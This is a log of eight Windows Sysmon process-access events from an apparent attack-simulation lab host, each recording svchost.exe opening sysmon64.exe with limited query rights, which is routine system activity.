{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1555,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1556,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1557,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1558,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1559,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1560,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1561,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1562,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
